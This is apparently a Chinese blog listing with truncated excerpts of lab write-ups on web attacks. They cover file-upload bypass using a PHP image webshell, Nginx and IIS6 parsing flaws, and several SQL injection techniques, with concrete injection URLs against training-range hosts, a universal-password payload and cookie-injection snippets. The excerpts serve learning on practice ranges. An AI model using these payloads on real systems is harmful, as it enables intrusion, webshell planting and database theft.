逸辰 8.7、文件上传漏洞总结
对应的截图放在压缩包了 好多天前做的...有点乱...Pass 1<?php phpinfo();?> txt上传抓包,发现抓不到包,前端验证改文件格式.txt为.jpg上传抓包 改包放回上传并执行成功 Pass 2制作图面马Win+R cmd copy a.jpg/b+b.txt c.jpg图片一定要尽可能小 本来我是为了好看。
逸辰 8.4、CGI解析漏洞--8.6、HTTP HEAD MIME验证
8.4、CGI解析漏洞Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设SCRIPT_FILENAME。 当访问www.xx.com/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置“phpinfo.jpg/1.php”,然
逸辰 8.1-8.3 IIS6.0解析漏洞(一)(二)(三)
IIS6.0解析漏洞: 1. IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx 也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx 都会调用 asp.dll2. IIS 6.0在处理含有特殊符号的
逸辰 5.4.1、Oracle注入- 报错注入
一、进入靶场 寻找注入点http://o1.lab.aqlab.cn:81/?id=1%27 报错 闭合http://o1.lab.aqlab.cn:81/?id=1%27-- 二、使用ctxsys.drithsx.sn函数进行报错注入查询数据库版本http://o1.lab.aqlab.cn:81/?id=1%27%20and%201=ctxsys.d
逸辰 5.3.1、MSSQL注入 - 反弹注入
MSSQL显错注入和MYSQL不太一样首先猜字段http://120.203.13.75:8150/MSSQL/?id=2%27%20order%20by%202%20-- 然后联合查询,记住要写UNION ALLhttp://120.203.13.75:8150/MSSQL/?id=2%27%20and%201=2%20union%20all%20select%20NULL,NULL
逸辰 5.2.1-5.2.2MYSQL DNS 注入
5.2.1、MYSQL 注入 - 全方位利用 这道题就当是回顾了,所以没有截图。一、进入靶场,寻找注入点http://120.203.13.75:6815/?id=1%20and%201=1 http://120.203.13.75:6815/?id=1%20and%201=2 基本判断其存在注入点二、order by猜字段http://120.203.13.75:6815/?id=1%20ord
逸辰 5.1.2、Access注入 — 偏移注入
一、判断注入点,发现被拦截了document.cookie="ID="+escape("105 and 1=1");发现正常回显,document.cookie="ID="+escape("105 and 1=2");错误说明存在注入 然后order by 猜字段 document.cookie="
逸辰 5.1.1、Access注入 — Cookie注入
一、进入靶场 and 1=1 发现被拦截了 尝试cookie注入,打开modheader,选择Request Headers 添加Cookie id=171进入http://120.203.13.75:8001/shownews.asp 发现正常,说明存在cookie注入 二、猜字段 id=171+order+by+10 猜得字段数为10 三、寻找注入点
逸辰 6.6.1-6.6.3-SQL注入-Post注入
6.6.1-SQL注入-Post注入Rank 1一、进入靶场 输入账号zkz密码zkz,得到回显Your sql statement is SELECT username, password FROM users WHERE username='zkz' and password='zkz' LIMIT 0,1利用万能密码1’ or 1=1查字段: 1’ or 1=
逸辰 6.5.1-6.5.3-SQL注入-Header注入
6.5.1-SQL注入-Header注入Rank 1一、首先进入靶场账号zkz 密码 zkz登陆一下这里我是用的火狐,先正常访问Your User Agent is: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0用谷歌访问Your User Agent is: Mozilla/5.0 (Window